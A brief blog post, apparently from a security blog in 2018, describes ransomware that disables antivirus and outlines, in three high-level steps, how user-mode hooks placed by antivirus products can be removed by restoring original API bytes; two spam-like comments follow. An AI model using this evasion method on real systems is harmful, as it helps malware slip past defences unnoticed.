Threat actor intend to stop your antivirus program – 2018

Just heard that there is a new attack method use by ransomware. The malware intend to stop and disable your workstation antivirus process. Since no antivirus protection, threat actor is free to do their task. Perhaps the defense vendor pay the focus on Ring 0 attack (kernel). Meanwhile new generation AV software implement behavioral detection analysis. So is there any space for threat actor?Yes, the ring 3 looks provides space to threat actor. They may find a way to evade the detection.

For instance:

  1. List all loaded DLL libraries in current process.
  2. Find entry-point address of every imported API function of each DLL library.
  3. Remove the injected hook JMP instruction by replacing it with the API’s original bytes.

Should you have interest to receive a high level understanding, please refer above diagram for reference.

2 thoughts on “Threat actor intend to stop your antivirus program – 2018”

  1. I see something truly interesting about your website so I saved to favorites.

  2. Hello my loved one! I wish to say that this post is amazing, great written and include almost all vital infos. I would like to peer extra posts like this .|

Comments are closed.